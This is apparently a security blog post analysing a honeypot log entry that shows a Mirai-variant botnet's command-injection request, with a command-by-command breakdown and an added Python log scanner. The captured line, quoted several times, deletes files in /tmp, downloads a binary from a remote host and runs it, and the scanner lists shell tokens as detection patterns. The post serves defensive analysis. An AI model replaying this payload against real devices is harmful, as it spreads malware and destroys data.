Investigating a Cyber Attack: Step by Step
Author: Fernando Amatte, Director of Red Team Services, Latin America
As a cybersecurity professional, I have my own laboratory with some virtual equipment acquired around the world. The goal is simply to research and conduct tests to identify new attacks, solutions and possibilities.
When the equipment is not in use, it keeps running as a “honeypot”. Honeypots are computers deliberately left online so that they get attacked. The computer records every access attempt in its logs, and again the goal is future research and analysis.
This weekend I came across something curious. While analyzing the logs of a web server, I identified the following line (the IP addresses are anonymized):
77.xxx.xxx.xxxx – – [27/Jun/2020:22:42:32 +0000] “GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1” 404 488 “-” “Hello, world”
Parsing the Log
- Who? IP address of the person making the connection: 77.xxx.xxx.xxxx
- When? Date and time: 27/Jun/2020:22:42:32 +0000
- What? What were you looking for or accessing? /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws
- Response code (right or wrong)? 404
- Browser? What browser were you using for this access? Hello, world
The “What?” and “Browser” fields stand out in this line. Legitimate requests do not normally carry Linux shell commands in the requested path, and the last field should identify the browser (Mozilla, Chrome, etc.), yet here it reads “Hello, world”.
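As an added example, not code from the original post, the two checks just described (shell commands in the request target, a user agent that is not a browser) can be automated over a web server access log. It assumes the Apache/nginx “combined” log format; the two sample lines are constructed (IP addresses from documentation ranges), the first mirroring the honeypot entry above.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: client identd user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shell constructs that have no business in a legitimate request target.
SHELL_TOKENS = ("wget ", "curl ", "chmod ", "sh ", "rm -rf", ";", "|", "`", "$(")
# A legitimate browser or crawler normally identifies itself with one of these.
BROWSER_HINTS = ("Mozilla", "Chrome", "Safari", "curl", "Wget", "bot")

def parse_line(line):
    """Split one log line into its fields; return None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # '+' encodes a space in the query string; decode so the command reads as typed.
    rec["decoded_target"] = unquote_plus(rec["target"])
    return rec

def suspicious(rec):
    """Return the reasons a parsed record looks like command injection (empty list = normal)."""
    reasons = []
    hits = [t for t in SHELL_TOKENS if t in rec["decoded_target"]]
    if hits:
        reasons.append(f"shell tokens in request target: {hits}")
    if not any(h in rec["agent"] for h in BROWSER_HINTS):
        reasons.append(f"non-browser user agent: {rec['agent']!r}")
    return reasons

# Constructed sample log lines (documentation IP ranges, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2020:22:42:32 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+203.0.113.5/bins/UnHAnaAW.x86;'
    'chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"',
    '198.51.100.22 - - [27/Jun/2020:22:45:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/78.0"',
]

def scan(lines):
    """Map each parseable line's client address to its list of reasons for suspicion."""
    return {rec["client"]: suspicious(rec) for rec in map(parse_line, lines) if rec}

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG).items():
        print(client, "SUSPICIOUS" if reasons else "ok", reasons)
```

A 404 response, as in the honeypot line, only means this server had no `/shell` endpoint; the same request against a device that does expose one would not be stopped by this check, which is why the log review matters.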
Analyzing the Command
The “+” characters in the log line are how spaces are encoded in a URL, so the request decodes to the following sequence of commands:
| Command | Meaning |
|---|---|
| cd /tmp | Go to the temporary directory |
| rm -rf * | Delete all content from this location |
| wget 185.yyy.yyy.yyy/bins/UnHAnaAW.x86 | Go to 185.yyy.yyy.yyy and download the file |
| chmod 777 /tmp/UnHAnaAW.x86 | Change the permissions on the UnHAnaAW.x86 file so that it can be executed |
| sh /tmp/UnHAnaAW.x86 w00dy.jaws | Execute the file, passing the text “w00dy.jaws” as a parameter |
The “What?” field above shows that, on a vulnerable device, the attacker would be able to execute commands on the victim’s machine. This means he could gain full access to the equipment and control it as he wishes.
Analyzing the location where the download should have been performed, we found a repository with binary files for different platforms or equipment, as shown in the figure below:
That this is malicious activity is also confirmed by checking the file UnHAnaAW.x86 on VirusTotal, where 40 different anti-malware engines flag it as malicious.
Many of these engines classify the file as a variant of Mirai, a malware family and botnet that has been causing damage since 2016. Checking figures 2 and 3, we see that the file was created on 09-June-2020 and submitted to VirusTotal the next day, 10-June-2020.
We conclude, therefore, that this file is new and differs from the 2016 version. It may contain more harmful features, but it is still part of the same family seen since 2016.
Looking up the IP address that made the access, we found a Mikrotik router. From this we can observe:
- The Mikrotik router is hacked and is looking for new victims for the botnet
- It is difficult, and perhaps impossible, to install antivirus software on some types of equipment
- There are several infected machines around the world
- We do not know:
  - How these machines will be used
  - Who the victims will be
  - When the next mass attack will happen
Right now, the devices in your home may be part of a network of previously hacked machines that is trying to hack into other devices. This can have an enormous impact and cause unknown losses to companies and individuals, which is why it is worth stressing the need to keep home devices updated.
This investigation was superficial, so it is not known how many machines are in this botnet. Regardless, any malicious machine is always a serious risk. For more than a year, different versions of this software have been scouring the internet for new victims, and we have no way of predicting when a new mass attack will happen.
If you are a regular technology user, update all of your devices and help us in this battle against cyber attacks and intrusions. If you are a cybersecurity professional, review your logs for anomalies and keep all systems, devices and your security policy up to date.